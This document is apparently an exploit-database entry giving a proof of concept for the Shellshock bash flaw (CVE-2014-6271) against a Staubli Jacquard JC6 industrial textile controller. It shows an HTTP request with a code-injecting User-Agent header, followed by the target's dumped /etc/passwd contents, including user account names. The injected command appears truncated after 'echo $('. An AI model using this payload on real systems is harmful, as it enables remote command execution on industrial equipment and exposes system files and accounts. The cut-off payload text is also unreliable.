# Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment Variable Handling Code Injection (Shellshock) # Date: 21.09.2018 # Exploit Author: t4rkd3vilz # Vendor Homepage: https://www.staubli.com # Software Link: https://www.staubli.com/tr-tr/textile/textile-machinery-solutions/ # Version:JC6 # CVE: CVE-2014-6271 # Tested on: Linux ----------------------------#PoC#---------------------------- --------------> Request GET / HTTP/1.1 Host: TargetIP User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo; echo $( Response root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin: sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp: guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/: lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico paul:!:201:1::/home/paul:/usr/bin/ksh jdoe:*:202:1:John Doe:/home/jdoe:/usr/bin/ksh Sorry your navigator doesn't accept frame.